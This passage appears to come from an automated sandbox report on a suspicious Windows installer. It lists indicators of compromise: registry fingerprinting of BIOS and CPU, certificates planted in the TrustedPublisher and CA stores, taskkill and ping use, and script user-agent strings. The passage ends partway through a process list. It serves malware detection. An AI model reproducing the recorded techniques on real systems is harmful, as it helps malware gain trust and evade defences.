\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Enumerates system info in registry 2 TTPs 63 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU MsiExec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MsiExec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS compattelrunner.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU compattelrunner.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Cleaner.exe -
Kills process with taskkill 2 IoCs
pid Process 4768 taskkill.exe 6828 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 Setup.tmp Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{3DEC943C-6F5B-4954-8CA3-C8749E2C8A55} Cleaner.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} Setup.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" Setup.tmp -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4620 PING.EXE -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 230 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 234 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 102 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 124 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 126 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 129 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4756 Setup (19).exe 4756 Setup (19).exe 1468 MsiExec.exe 1468 MsiExec.exe 3732 WerFault.exe 3732 WerFault.exe 4268 NrLBDgFrC3ZdkgRSNcLC8zYU.exe 4268 NrLBDgFrC3ZdkgRSNcLC8zYU.exe 1500 WerFault.exe 1500 WerFault.exe 2784 WerFault.exe 2784 WerFault.exe 960 WerFault.exe 960 WerFault.exe 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 5196 WerFault.exe 5196 